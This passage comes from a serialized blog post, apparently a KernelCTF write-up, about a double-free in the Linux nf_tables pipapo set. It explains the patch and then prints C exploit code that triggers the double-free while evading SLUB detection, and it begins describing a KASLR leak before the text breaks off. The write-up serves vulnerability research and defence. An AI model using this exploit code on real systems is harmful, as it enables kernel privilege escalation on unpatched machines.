limited\n",{"type":26,"tag":137,"props":56650,"children":56651},{"class":5559,"line":11697},[56652],{"type":26,"tag":137,"props":56653,"children":56654},{},[56655],{"type":32,"value":56656},"to it).\"\n",{"type":26,"tag":137,"props":56658,"children":56659},{"class":5559,"line":11803},[56660],{"type":26,"tag":137,"props":56661,"children":56662},{"emptyLinePlaceholder":18},[56663],{"type":32,"value":6276},{"type":26,"tag":137,"props":56665,"children":56666},{"class":5559,"line":26089},[56667],{"type":26,"tag":137,"props":56668,"children":56669},{},[56670],{"type":32,"value":56671},"Fixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\n",{"type":26,"tag":137,"props":56673,"children":56674},{"class":5559,"line":26124},[56675],{"type":26,"tag":137,"props":56676,"children":56677},{},[56678],{"type":32,"value":56679},"Reviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\n",{"type":26,"tag":137,"props":56681,"children":56682},{"class":5559,"line":26132},[56683],{"type":26,"tag":137,"props":56684,"children":56685},{},[56686],{"type":32,"value":56687},"Signed-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n",{"type":26,"tag":35,"props":56689,"children":56690},{},[56691,56693,56698,56700,56705,56707,56712,56714,56719],{"type":32,"value":56692},"As we previously discussed, committing changes to a pipapo ",{"type":26,"tag":130,"props":56694,"children":56696},{"className":56695},[],[56697],{"type":32,"value":53622},{"type":32,"value":56699}," is implemented by creating a clone of the match object, to which changes are made during the control plane. Later, if we enter the commit path, the changes are committed in the ",{"type":26,"tag":130,"props":56701,"children":56703},{"className":56702},[],[56704],{"type":32,"value":54948},{"type":32,"value":56706}," method by simply replacing the ",{"type":26,"tag":130,"props":56708,"children":56710},{"className":56709},[],[56711],{"type":32,"value":53622},{"type":32,"value":56713},"s match object with its updated clone. So checking the ",{"type":26,"tag":130,"props":56715,"children":56717},{"className":56716},[],[56718],{"type":32,"value":53576},{"type":32,"value":56720}," flag and then calling free again ensures we also free uncommitted changes.",{"type":26,"tag":35,"props":56722,"children":56723},{},[56724,56726,56731],{"type":32,"value":56725},"This doesn't make sense in the commit path but only in the abort path. Evidently, when aborting the transaction that creates the ",{"type":26,"tag":130,"props":56727,"children":56729},{"className":56728},[],[56730],{"type":32,"value":53622},{"type":32,"value":56732},", there will be no committed changes, and there will only be the elements inside the clone, which will end up never being committed. So, to make sure we free these uncommitted elements, it's crucial to free what's in the clone.",{"type":26,"tag":35,"props":56734,"children":56735},{},[56736,56738,56744,56746,56751,56753,56758],{"type":32,"value":56737},"When this code was introduced, it was only reachable from the abort path because it was the only path where ",{"type":26,"tag":130,"props":56739,"children":56741},{"className":56740},[],[56742],{"type":32,"value":56743},"set->ops->destroy()",{"type":32,"value":56745}," could be called without clearing the ",{"type":26,"tag":130,"props":56747,"children":56749},{"className":56748},[],[56750],{"type":32,"value":53576},{"type":32,"value":56752}," flag, which was fine considering you didn't have duplicated views of the ",{"type":26,"tag":130,"props":56754,"children":56756},{"className":56755},[],[56757],{"type":32,"value":53614},{"type":32,"value":56759},"s, so they would all be in the clone set.",{"type":26,"tag":35,"props":56761,"children":56762},{},[56763,56765,56770],{"type":32,"value":56764},"But when the ",{"type":26,"tag":130,"props":56766,"children":56768},{"className":56767},[],[56769],{"type":32,"value":56332},{"type":32,"value":56771}," flag was introduced, some assumptions about the commit path were changed. It created a new way of reaching this code while having already committed changes in the set. This means any already committed changes will have a view in the \"normal\" match object and one in the clone.",{"type":26,"tag":35,"props":56773,"children":56774},{},[56775],{"type":32,"value":56776},"The vulnerability was fixed by only deleting elements from the clone because the clone should have all views of committed and uncommitted changes, effectively eliminating the double-free vulnerability.",{"type":26,"tag":92,"props":56778,"children":56780},{"id":56779},"kernelctf-exploit",[56781],{"type":32,"value":56782},"KernelCTF exploit",{"type":26,"tag":35,"props":56784,"children":56785},{},[56786,56788,56794,56796,56803],{"type":32,"value":56787},"Now that we know the full story of the bug, let's look into how I exploited it in the KernelCTF LTS instance before getting into the universal exploit. A great deal of the exploit is based on the ",{"type":26,"tag":130,"props":56789,"children":56791},{"className":56790},[],[56792],{"type":32,"value":56793},"nft_object + udata",{"type":32,"value":56795}," technique shared by lonial con in a ",{"type":26,"tag":41,"props":56797,"children":56800},{"href":56798,"rel":56799},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md",[45],[56801],{"type":32,"value":56802},"previous kernelCTF exploit",{"type":32,"value":470},{"type":26,"tag":118,"props":56805,"children":56807},{"id":56806},"trigger-uafavoid-double-free-detection",[56808],{"type":32,"value":56809},"Trigger UAF/avoid double-free detection",{"type":26,"tag":35,"props":56811,"children":56812},{},[56813,56815,56821,56823,56829],{"type":32,"value":56814},"The SLUB allocator has a naive double-free detection mechanism to spot straightforward sequences, such as the same object being added to the free-list twice in a row without any other objects being added in between.\nAs we have seen, ",{"type":26,"tag":130,"props":56816,"children":56818},{"className":56817},[],[56819],{"type":32,"value":56820},"nft_set_pipapo_match_destroy",{"type":32,"value":56822}," iterates over the ",{"type":26,"tag":130,"props":56824,"children":56826},{"className":56825},[],[56827],{"type":32,"value":56828},"setelems",{"type":32,"value":56830}," in the set and frees each of them, so it should be relatively simple to avoid detection by having more than one element in the set, in which case the following will happen:",{"type":26,"tag":4820,"props":56832,"children":56833},{},[56834,56839,56844,56849],{"type":26,"tag":3430,"props":56835,"children":56836},{},[56837],{"type":32,"value":56838},"Element A gets freed",{"type":26,"tag":3430,"props":56840,"children":56841},{},[56842],{"type":32,"value":56843},"Element B gets free",{"type":26,"tag":3430,"props":56845,"children":56846},{},[56847],{"type":32,"value":56848},"Element A gets freed again (double-free)",{"type":26,"tag":3430,"props":56850,"children":56851},{},[56852],{"type":32,"value":56853},"Element B gets freed again (double-free)",{"type":26,"tag":5512,"props":56855,"children":56857},{"className":31704,"code":56856,"language":31706,"meta":7,"style":7},"[...]\nstatic void trigger_uaf(struct mnl_socket *nl, size_t size, int *msgqids)\n{\n[...]\n    // TRANSACTION 2\n[...]\n\n    // create pipapo set\n    uint8_t desc[2] = {16, 16};\n    set = create_set(\n        batch, seq++, exploit_table_name, \"pwn_set\", 0x1337,\n        NFT_SET_INTERVAL | NFT_SET_OBJECT | NFT_SET_CONCAT, KEY_LEN, 2, &desc, NULL, 0, NFT_OBJECT_CT_EXPECT);\n\n    // commit 2 elems to set (elems A and B that will be double-freed)\n    for (int i = 0; i \u003C 2; i++)\n    {\n        elem[i] = nftnl_set_elem_alloc();\n        memset(key, 0x41 + i, KEY_LEN);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_USERDATA, &udata_buf, size);\n        nftnl_set_elem_add(set, elem[i]);\n    }\n[...]\n\n    // TRANSACTION 3\n[...]\n    set = nftnl_set_alloc();\n    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);\n    nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);\n    nftnl_set_set_str(set, NFTNL_SET_NAME, \"pwn_set\");\n\n    // make priv->dirty true\n    memset(key, 0xff, KEY_LEN);\n    elem[3] = nftnl_set_elem_alloc();\n    nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n    nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n    nftnl_set_elem_add(set, elem[3]);\n[...]\n\n    // double-free commited elems\n[...]\n    nftnl_set_free(set);\n}\n[...]\n",[56858],{"type":26,"tag":130,"props":56859,"children":56860},{"__ignoreMap":7},[56861,56868,56929,56936,56943,56951,56958,56965,56973,56997,57018,57052,57113,57120,57128,57180,57187,57213,57240,57278,57307,57336,57358,57365,57372,57379,57387,57394,57402,57415,57428,57448,57455,57463,57485,57517,57562,57598,57626,57633,57640,57648,57655,57671,57678],{"type":26,"tag":137,"props":56862,"children":56863},{"class":5559,"line":5560},[56864],{"type":26,"tag":137,"props":56865,"children":56866},{"style":5601},[56867],{"type":32,"value":12908},{"type":26,"tag":137,"props":56869,"children":56870},{"class":5559,"line":5412},[56871,56876,56880,56885,56889,56894,56898,56903,56908,56912,56916,56920,56925],{"type":26,"tag":137,"props":56872,"children":56873},{"style":5601},[56874],{"type":32,"value":56875},"static void trigger_uaf(",{"type":26,"tag":137,"props":56877,"children":56878},{"style":5573},[56879],{"type":32,"value":11990},{"type":26,"tag":137,"props":56881,"children":56882},{"style":6009},[56883],{"type":32,"value":56884}," mnl_socket",{"type":26,"tag":137,"props":56886,"children":56887},{"style":5573},[56888],{"type":32,"value":12406},{"type":26,"tag":137,"props":56890,"children":56891},{"style":5584},[56892],{"type":32,"value":56893},"nl",{"type":26,"tag":137,"props":56895,"children":56896},{"style":5601},[56897],{"type":32,"value":1108},{"type":26,"tag":137,"props":56899,"children":56900},{"style":5573},[56901],{"type":32,"value":56902},"size_t",{"type":26,"tag":137,"props":56904,"children":56905},{"style":5584},[56906],{"type":32,"value":56907}," size",{"type":26,"tag":137,"props":56909,"children":56910},{"style":5601},[56911],{"type":32,"value":1108},{"type":26,"tag":137,"props":56913,"children":56914},{"style":5573},[56915],{"type":32,"value":21640},{"type":26,"tag":137,"props":56917,"children":56918},{"style":5573},[56919],{"type":32,"value":12406},{"type":26,"tag":137,"props":56921,"children":56922},{"style":5584},[56923],{"type":32,"value":56924},"msgqids",{"type":26,"tag":137,"props":56926,"children":56927},{"style":5601},[56928],{"type":32,"value":5742},{"type":26,"tag":137,"props":56930,"children":56931},{"class":5559,"line":5417},[56932],{"type":26,"tag":137,"props":56933,"children":56934},{"style":5601},[56935],{"type":32,"value":13471},{"type":26,"tag":137,"props":56937,"children":56938},{"class":5559,"line":5642},[56939],{"type":26,"tag":137,"props":56940,"children":56941},{"style":5601},[56942],{"type":32,"value":12908},{"type":26,"tag":137,"props":56944,"children":56945},{"class":5559,"line":5745},[56946],{"type":26,"tag":137,"props":56947,"children":56948},{"style":5601},[56949],{"type":32,"value":56950},"    // TRANSACTION 2\n",{"type":26,"tag":137,"props":56952,"children":56953},{"class":5559,"line":5850},[56954],{"type":26,"tag":137,"props":56955,"children":56956},{"style":5601},[56957],{"type":32,"value":12908},{"type":26,"tag":137,"props":56959,"children":56960},{"class":5559,"line":5878},[56961],{"type":26,"tag":137,"props":56962,"children":56963},{"emptyLinePlaceholder":18},[56964],{"type":32,"value":6276},{"type":26,"tag":137,"props":56966,"children":56967},{"class":5559,"line":5891},[56968],{"type":26,"tag":137,"props":56969,"children":56970},{"style":5601},[56971],{"type":32,"value":56972},"    // create pipapo set\n",{"type":26,"tag":137,"props":56974,"children":56975},{"class":5559,"line":5909},[56976,56981,56985,56989,56993],{"type":26,"tag":137,"props":56977,"children":56978},{"style":5601},[56979],{"type":32,"value":56980},"    uint8_t desc[2] = {",{"type":26,"tag":137,"props":56982,"children":56983},{"style":5626},[56984],{"type":32,"value":43444},{"type":26,"tag":137,"props":56986,"children":56987},{"style":5601},[56988],{"type":32,"value":1108},{"type":26,"tag":137,"props":56990,"children":56991},{"style":5626},[56992],{"type":32,"value":43444},{"type":26,"tag":137,"props":56994,"children":56995},{"style":5601},[56996],{"type":32,"value":19170},{"type":26,"tag":137,"props":56998,"children":56999},{"class":5559,"line":5930},[57000,57005,57009,57014],{"type":26,"tag":137,"props":57001,"children":57002},{"style":5601},[57003],{"type":32,"value":57004},"    set ",{"type":26,"tag":137,"props":57006,"children":57007},{"style":5590},[57008],{"type":32,"value":289},{"type":26,"tag":137,"props":57010,"children":57011},{"style":5682},[57012],{"type":32,"value":57013}," create_set",{"type":26,"tag":137,"props":57015,"children":57016},{"style":5601},[57017],{"type":32,"value":6054},{"type":26,"tag":137,"props":57019,"children":57020},{"class":5559,"line":5939},[57021,57026,57030,57035,57040,57044,57048],{"type":26,"tag":137,"props":57022,"children":57023},{"style":5601},[57024],{"type":32,"value":57025},"        batch, seq",{"type":26,"tag":137,"props":57027,"children":57028},{"style":5590},[57029],{"type":32,"value":53872},{"type":26,"tag":137,"props":57031,"children":57032},{"style":5601},[57033],{"type":32,"value":57034},", exploit_table_name, ",{"type":26,"tag":137,"props":57036,"children":57037},{"style":6837},[57038],{"type":32,"value":57039},"\"pwn_set\"",{"type":26,"tag":137,"props":57041,"children":57042},{"style":5601},[57043],{"type":32,"value":1108},{"type":26,"tag":137,"props":57045,"children":57046},{"style":5626},[57047],{"type":32,"value":46101},{"type":26,"tag":137,"props":57049,"children":57050},{"style":5601},[57051],{"type":32,"value":6099},{"type":26,"tag":137,"props":57053,"children":57054},{"class":5559,"line":6191},[57055,57060,57064,57069,57073,57078,57082,57086,57090,57095,57100,57104,57108],{"type":26,"tag":137,"props":57056,"children":57057},{"style":5601},[57058],{"type":32,"value":57059},"        NFT_SET_INTERVAL ",{"type":26,"tag":137,"props":57061,"children":57062},{"style":5590},[57063],{"type":32,"value":13006},{"type":26,"tag":137,"props":57065,"children":57066},{"style":5601},[57067],{"type":32,"value":57068}," NFT_SET_OBJECT ",{"type":26,"tag":137,"props":57070,"children":57071},{"style":5590},[57072],{"type":32,"value":13006},{"type":26,"tag":137,"props":57074,"children":57075},{"style":5601},[57076],{"type":32,"value":57077}," NFT_SET_CONCAT, KEY_LEN, ",{"type":26,"tag":137,"props":57079,"children":57080},{"style":5626},[57081],{"type":32,"value":277},{"type":26,"tag":137,"props":57083,"children":57084},{"style":5601},[57085],{"type":32,"value":1108},{"type":26,"tag":137,"props":57087,"children":57088},{"style":5590},[57089],{"type":32,"value":5694},{"type":26,"tag":137,"props":57091,"children":57092},{"style":5601},[57093],{"type":32,"value":57094},"desc, ",{"type":26,"tag":137,"props":57096,"children":57097},{"style":5573},[57098],{"type":32,"value":57099},"NULL",{"type":26,"tag":137,"props":57101,"children":57102},{"style":5601},[57103],{"type":32,"value":1108},{"type":26,"tag":137,"props":57105,"children":57106},{"style":5626},[57107],{"type":32,"value":1817},{"type":26,"tag":137,"props":57109,"children":57110},{"style":5601},[57111],{"type":32,"value":57112},", NFT_OBJECT_CT_EXPECT);\n",{"type":26,"tag":137,"props":57114,"children":57115},{"class":5559,"line":6208},[57116],{"type":26,"tag":137,"props":57117,"children":57118},{"emptyLinePlaceholder":18},[57119],{"type":32,"value":6276},{"type":26,"tag":137,"props":57121,"children":57122},{"class":5559,"line":6225},[57123],{"type":26,"tag":137,"props":57124,"children":57125},{"style":5564},[57126],{"type":32,"value":57127},"    // commit 2 elems to set (elems A and B that will be double-freed)\n",{"type":26,"tag":137,"props":57129,"children":57130},{"class":5559,"line":6238},[57131,57135,57139,57143,57148,57152,57156,57160,57164,57168,57172,57176],{"type":26,"tag":137,"props":57132,"children":57133},{"style":5610},[57134],{"type":32,"value":5613},{"type":26,"tag":137,"props":57136,"children":57137},{"style":5601},[57138],{"type":32,"value":4625},{"type":26,"tag":137,"props":57140,"children":57141},{"style":5573},[57142],{"type":32,"value":21640},{"type":26,"tag":137,"props":57144,"children":57145},{"style":5601},[57146],{"type":32,"value":57147}," i ",{"type":26,"tag":137,"props":57149,"children":57150},{"style":5590},[57151],{"type":32,"value":289},{"type":26,"tag":137,"props":57153,"children":57154},{"style":5626},[57155],{"type":32,"value":5629},{"type":26,"tag":137,"props":57157,"children":57158},{"style":5601},[57159],{"type":32,"value":53836},{"type":26,"tag":137,"props":57161,"children":57162},{"style":5590},[57163],{"type":32,"value":8391},{"type":26,"tag":137,"props":57165,"children":57166},{"style":5626},[57167],{"type":32,"value":10519},{"type":26,"tag":137,"props":57169,"children":57170},{"style":5601},[57171],{"type":32,"value":53867},{"type":26,"tag":137,"props":57173,"children":57174},{"style":5590},[57175],{"type":32,"value":53872},{"type":26,"tag":137,"props":57177,"children":57178},{"style":5601},[57179],{"type":32,"value":5742},{"type":26,"tag":137,"props":57181,"children":57182},{"class":5559,"line":6247},[57183],{"type":26,"tag":137,"props":57184,"children":57185},{"style":5601},[57186],{"type":32,"value":31781},{"type":26,"tag":137,"props":57188,"children":57189},{"class":5559,"line":6270},[57190,57195,57200,57204,57209],{"type":26,"tag":137,"props":57191,"children":57192},{"style":5584},[57193],{"type":32,"value":57194},"        elem",{"type":26,"tag":137,"props":57196,"children":57197},{"style":5601},[57198],{"type":32,"value":57199},"[i] ",{"type":26,"tag":137,"props":57201,"children":57202},{"style":5590},[57203],{"type":32,"value":289},{"type":26,"tag":137,"props":57205,"children":57206},{"style":5682},[57207],{"type":32,"value":57208}," nftnl_set_elem_alloc",{"type":26,"tag":137,"props":57210,"children":57211},{"style":5601},[57212],{"type":32,"value":6267},{"type":26,"tag":137,"props":57214,"children":57215},{"class":5559,"line":6279},[57216,57221,57226,57231,57235],{"type":26,"tag":137,"props":57217,"children":57218},{"style":5682},[57219],{"type":32,"value":57220},"        memset",{"type":26,"tag":137,"props":57222,"children":57223},{"style":5601},[57224],{"type":32,"value":57225},"(key, ",{"type":26,"tag":137,"props":57227,"children":57228},{"style":5626},[57229],{"type":32,"value":57230},"0x41",{"type":26,"tag":137,"props":57232,"children":57233},{"style":5590},[57234],{"type":32,"value":11491},{"type":26,"tag":137,"props":57236,"children":57237},{"style":5601},[57238],{"type":32,"value":57239}," i, KEY_LEN);\n",{"type":26,"tag":137,"props":57241,"children":57242},{"class":5559,"line":6288},[57243,57248,57252,57256,57261,57266,57270,57274],{"type":26,"tag":137,"props":57244,"children":57245},{"style":5682},[57246],{"type":32,"value":57247},"        nftnl_set_elem_set",{"type":26,"tag":137,"props":57249,"children":57250},{"style":5601},[57251],{"type":32,"value":165},{"type":26,"tag":137,"props":57253,"children":57254},{"style":5584},[57255],{"type":32,"value":54667},{"type":26,"tag":137,"props":57257,"children":57258},{"style":5601},[57259],{"type":32,"value":57260},"[i], NFTNL_SET_ELEM_OBJREF, ",{"type":26,"tag":137,"props":57262,"children":57263},{"style":6837},[57264],{"type":32,"value":57265},"\"pwnobj\"",{"type":26,"tag":137,"props":57267,"children":57268},{"style":5601},[57269],{"type":32,"value":1108},{"type":26,"tag":137,"props":57271,"children":57272},{"style":5626},[57273],{"type":32,"value":375},{"type":26,"tag":137,"props":57275,"children":57276},{"style":5601},[57277],{"type":32,"value":6430},{"type":26,"tag":137,"props":57279,"children":57280},{"class":5559,"line":6355},[57281,57285,57289,57293,57298,57302],{"type":26,"tag":137,"props":57282,"children":57283},{"style":5682},[57284],{"type":32,"value":57247},{"type":26,"tag":137,"props":57286,"children":57287},{"style":5601},[57288],{"type":32,"value":165},{"type":26,"tag":137,"props":57290,"children":57291},{"style":5584},[57292],{"type":32,"value":54667},{"type":26,"tag":137,"props":57294,"children":57295},{"style":5601},[57296],{"type":32,"value":57297},"[i], NFTNL_SET_ELEM_KEY, ",{"type":26,"tag":137,"props":57299,"children":57300},{"style":5590},[57301],{"type":32,"value":5694},{"type":26,"tag":137,"props":57303,"children":57304},{"style":5601},[57305],{"type":32,"value":57306},"key, KEY_LEN);\n",{"type":26,"tag":137,"props":57308,"children":57309},{"class":5559,"line":6363},[57310,57314,57318,57322,57327,57331],{"type":26,"tag":137,"props":57311,"children":57312},{"style":5682},[57313],{"type":32,"value":57247},{"type":26,"tag":137,"props":57315,"children":57316},{"style":5601},[57317],{"type":32,"value":165},{"type":26,"tag":137,"props":57319,"children":57320},{"style":5584},[57321],{"type":32,"value":54667},{"type":26,"tag":137,"props":57323,"children":57324},{"style":5601},[57325],{"type":32,"value":57326},"[i], NFTNL_SET_ELEM_USERDATA, ",{"type":26,"tag":137,"props":57328,"children":57329},{"style":5590},[57330],{"type":32,"value":5694},{"type":26,"tag":137,"props":57332,"children":57333},{"style":5601},[57334],{"type":32,"value":57335},"udata_buf, size);\n",{"type":26,"tag":137,"props":57337,"children":57338},{"class":5559,"line":6393},[57339,57344,57349,57353],{"type":26,"tag":137,"props":57340,"children":57341},{"style":5682},[57342],{"type":32,"value":57343},"        nftnl_set_elem_add",{"type":26,"tag":137,"props":57345,"children":57346},{"style":5601},[57347],{"type":32,"value":57348},"(set, ",{"type":26,"tag":137,"props":57350,"children":57351},{"style":5584},[57352],{"type":32,"value":54667},{"type":26,"tag":137,"props":57354,"children":57355},{"style":5601},[57356],{"type":32,"value":57357},"[i]);\n",{"type":26,"tag":137,"props":57359,"children":57360},{"class":5559,"line":6401},[57361],{"type":26,"tag":137,"props":57362,"children":57363},{"style":5601},[57364],{"type":32,"value":5945},{"type":26,"tag":137,"props":57366,"children":57367},{"class":5559,"line":6433},[57368],{"type":26,"tag":137,"props":57369,"children":57370},{"style":5601},[57371],{"type":32,"value":12908},{"type":26,"tag":137,"props":57373,"children":57374},{"class":5559,"line":6441},[57375],{"type":26,"tag":137,"props":57376,"children":57377},{"emptyLinePlaceholder":18},[57378],{"type":32,"value":6276},{"type":26,"tag":137,"props":57380,"children":57381},{"class":5559,"line":6501},[57382],{"type":26,"tag":137,"props":57383,"children":57384},{"style":5601},[57385],{"type":32,"value":57386},"    // TRANSACTION 3\n",{"type":26,"tag":137,"props":57388,"children":57389},{"class":5559,"line":11634},[57390],{"type":26,"tag":137,"props":57391,"children":57392},{"style":5601},[57393],{"type":32,"value":12908},{"type":26,"tag":137,"props":57395,"children":57396},{"class":5559,"line":11652},[57397],{"type":26,"tag":137,"props":57398,"children":57399},{"style":5601},[57400],{"type":32,"value":57401},"    set = nftnl_set_alloc();\n",{"type":26,"tag":137,"props":57403,"children":57404},{"class":5559,"line":11697},[57405,57410],{"type":26,"tag":137,"props":57406,"children":57407},{"style":5682},[57408],{"type":32,"value":57409},"    nftnl_set_set_u32",{"type":26,"tag":137,"props":57411,"children":57412},{"style":5601},[57413],{"type":32,"value":57414},"(set, NFTNL_SET_FAMILY, family);\n",{"type":26,"tag":137,"props":57416,"children":57417},{"class":5559,"line":11803},[57418,57423],{"type":26,"tag":137,"props":57419,"children":57420},{"style":5682},[57421],{"type":32,"value":57422},"    nftnl_set_set_str",{"type":26,"tag":137,"props":57424,"children":57425},{"style":5601},[57426],{"type":32,"value":57427},"(set, NFTNL_SET_TABLE, exploit_table_name);\n",{"type":26,"tag":137,"props":57429,"children":57430},{"class":5559,"line":26089},[57431,57435,57440,57444],{"type":26,"tag":137,"props":57432,"children":57433},{"style":5682},[57434],{"type":32,"value":57422},{"type":26,"tag":137,"props":57436,"children":57437},{"style":5601},[57438],{"type":32,"value":57439},"(set, NFTNL_SET_NAME, ",{"type":26,"tag":137,"props":57441,"children":57442},{"style":6837},[57443],{"type":32,"value":57039},{"type":26,"tag":137,"props":57445,"children":57446},{"style":5601},[57447],{"type":32,"value":6430},{"type":26,"tag":137,"props":57449,"children":57450},{"class":5559,"line":26124},[57451],{"type":26,"tag":137,"props":57452,"children":57453},{"emptyLinePlaceholder":18},[57454],{"type":32,"value":6276},{"type":26,"tag":137,"props":57456,"children":57457},{"class":5559,"line":26132},[57458],{"type":26,"tag":137,"props":57459,"children":57460},{"style":5564},[57461],{"type":32,"value":57462},"    // make priv->dirty true\n",{"type":26,"tag":137,"props":57464,"children":57465},{"class":5559,"line":26140},[57466,57471,57475,57480],{"type":26,"tag":137,"props":57467,"children":57468},{"style":5682},[57469],{"type":32,"value":57470},"    memset",{"type":26,"tag":137,"props":57472,"children":57473},{"style":5601},[57474],{"type":32,"value":57225},{"type":26,"tag":137,"props":57476,"children":57477},{"style":5626},[57478],{"type":32,"value":57479},"0xff",{"type":26,"tag":137,"props":57481,"children":57482},{"style":5601},[57483],{"type":32,"value":57484},", KEY_LEN);\n",{"type":26,"tag":137,"props":57486,"children":57487},{"class":5559,"line":26149},[57488,57493,57497,57501,57505,57509,57513],{"type":26,"tag":137,"props":57489,"children":57490},{"style":5584},[57491],{"type":32,"value":57492},"    elem",{"type":26,"tag":137,"props":57494,"children":57495},{"style":5601},[57496],{"type":32,"value":3016},{"type":26,"tag":137,"props":57498,"children":57499},{"style":5626},[57500],{"type":32,"value":344},{"type":26,"tag":137,"props":57502,"children":57503},{"style":5601},[57504],{"type":32,"value":11247},{"type":26,"tag":137,"props":57506,"children":57507},{"style":5590},[57508],{"type":32,"value":289},{"type":26,"tag":137,"props":57510,"children":57511},{"style":5682},[57512],{"type":32,"value":57208},{"type":26,"tag":137,"props":57514,"children":57515},{"style":5601},[57516],{"type":32,"value":6267},{"type":26,"tag":137,"props":57518,"children":57519},{"class":5559,"line":26191},[57520,57525,57529,57533,57537,57541,57546,57550,57554,57558],{"type":26,"tag":137,"props":57521,"children":57522},{"style":5682},[57523],{"type":32,"value":57524},"    nftnl_set_elem_set",{"type":26,"tag":137,"props":57526,"children":57527},{"style":5601},[57528],{"type":32,"value":165},{"type":26,"tag":137,"props":57530,"children":57531},{"style":5584},[57532],{"type":32,"value":54667},{"type":26,"tag":137,"props":57534,"children":57535},{"style":5601},[57536],{"type":32,"value":3016},{"type":26,"tag":137,"props":57538,"children":57539},{"style":5626},[57540],{"type":32,"value":344},{"type":26,"tag":137,"props":57542,"children":57543},{"style":5601},[57544],{"type":32,"value":57545},"], NFTNL_SET_ELEM_OBJREF, ",{"type":26,"tag":137,"props":57547,"children":57548},{"style":6837},[57549],{"type":32,"value":57265},{"type":26,"tag":137,"props":57551,"children":57552},{"style":5601},[57553],{"type":32,"value":1108},{"type":26,"tag":137,"props":57555,"children":57556},{"style":5626},[57557],{"type":32,"value":375},{"type":26,"tag":137,"props":57559,"children":57560},{"style":5601},[57561],{"type":32,"value":6430},{"type":26,"tag":137,"props":57563,"children":57564},{"class":5559,"line":26224},[57565,57569,57573,57577,57581,57585,57590,57594],{"type":26,"tag":137,"props":57566,"children":57567},{"style":5682},[57568],{"type":32,"value":57524},{"type":26,"tag":137,"props":57570,"children":57571},{"style":5601},[57572],{"type":32,"value":165},{"type":26,"tag":137,"props":57574,"children":57575},{"style":5584},[57576],{"type":32,"value":54667},{"type":26,"tag":137,"props":57578,"children":57579},{"style":5601},[57580],{"type":32,"value":3016},{"type":26,"tag":137,"props":57582,"children":57583},{"style":5626},[57584],{"type":32,"value":344},{"type":26,"tag":137,"props":57586,"children":57587},{"style":5601},[57588],{"type":32,"value":57589},"], NFTNL_SET_ELEM_KEY, ",{"type":26,"tag":137,"props":57591,"children":57592},{"style":5590},[57593],{"type":32,"value":5694},{"type":26,"tag":137,"props":57595,"children":57596},{"style":5601},[57597],{"type":32,"value":57306},{"type":26,"tag":137,"props":57599,"children":57600},{"class":5559,"line":26232},[57601,57606,57610,57614,57618,57622],{"type":26,"tag":137,"props":57602,"children":57603},{"style":5682},[57604],{"type":32,"value":57605},"    nftnl_set_elem_add",{"type":26,"tag":137,"props":57607,"children":57608},{"style":5601},[57609],{"type":32,"value":57348},{"type":26,"tag":137,"props":57611,"children":57612},{"style":5584},[57613],{"type":32,"value":54667},{"type":26,"tag":137,"props":57615,"children":57616},{"style":5601},[57617],{"type":32,"value":3016},{"type":26,"tag":137,"props":57619,"children":57620},{"style":5626},[57621],{"type":32,"value":344},{"type":26,"tag":137,"props":57623,"children":57624},{"style":5601},[57625],{"type":32,"value":6352},{"type":26,"tag":137,"props":57627,"children":57628},{"class":5559,"line":26240},[57629],{"type":26,"tag":137,"props":57630,"children":57631},{"style":5601},[57632],{"type":32,"value":12908},{"type":26,"tag":137,"props":57634,"children":57635},{"class":5559,"line":26249},[57636],{"type":26,"tag":137,"props":57637,"children":57638},{"emptyLinePlaceholder":18},[57639],{"type":32,"value":6276},{"type":26,"tag":137,"props":57641,"children":57642},{"class":5559,"line":26325},[57643],{"type":26,"tag":137,"props":57644,"children":57645},{"style":5601},[57646],{"type":32,"value":57647},"    // double-free commited elems\n",{"type":26,"tag":137,"props":57649,"children":57650},{"class":5559,"line":26358},[57651],{"type":26,"tag":137,"props":57652,"children":57653},{"style":5601},[57654],{"type":32,"value":12908},{"type":26,"tag":137,"props":57656,"children":57657},{"class":5559,"line":26366},[57658,57663,57667],{"type":26,"tag":137,"props":57659,"children":57660},{"style":5601},[57661],{"type":32,"value":57662},"    nftnl_set_free(",{"type":26,"tag":137,"props":57664,"children":57665},{"style":6009},[57666],{"type":32,"value":53622},{"type":26,"tag":137,"props":57668,"children":57669},{"style":5601},[57670],{"type":32,"value":6430},{"type":26,"tag":137,"props":57672,"children":57673},{"class":5559,"line":26374},[57674],{"type":26,"tag":137,"props":57675,"children":57676},{"style":5601},[57677],{"type":32,"value":6507},{"type":26,"tag":137,"props":57679,"children":57680},{"class":5559,"line":26411},[57681],{"type":26,"tag":137,"props":57682,"children":57683},{"style":5601},[57684],{"type":32,"value":12908},{"type":26,"tag":118,"props":57686,"children":57688},{"id":57687},"leaking-kaslr",[57689],{"type":32,"value":57690},"Leaking KASLR",{"type":26,"tag":35,"props":57692,"children":57693},{},[57694,57696,57702,57704,57709,57711,57717,57719,57725,57727],{"type":32,"value":57695},"Tables contain an outline user data buffer ",{"type":26,"tag":130,"props":57697,"children":57699},{"className":57698},[],[57700],{"type":32,"value":57701},"udata",{"type":32,"value":57703}," that we can both read and write. By allocating a ",{"type":26,"tag":130,"props":57705,"children":57707},{"className":57706},[],[57708],{"type":32,"value":57701},{"type":32,"value":57710}," buffer on the double-free slot and then overlapping it with an ",{"type":26,"tag":130,"props":57712,"children":57714},{"className":57713},[],[57715],{"type":32,"value":57716},"nft_object",{"type":32,"value":57718}," we can leak the ",{"type":26,"tag":130,"props":57720,"children":57722},{"className":57721},[],[57723],{"type":32,"value":57724},"->ops",{"type":32,"value":57726}," pointer, and use it to calculate the KASLR 